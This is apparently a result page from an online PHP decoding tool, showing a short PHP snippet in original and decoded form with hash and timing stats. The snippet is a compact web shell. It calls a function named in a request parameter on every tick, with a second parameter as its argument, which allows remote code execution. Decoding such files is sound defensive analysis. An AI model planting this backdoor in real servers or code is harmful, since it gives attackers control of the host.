Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST['pass']..

Decoded Output download

<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);
?>

Function Calls

None

Variables

$e None

Stats

MD5 6201e83048c5d0561a9e5a71cc3af47f
Eval Count 0
Decode Time 86 ms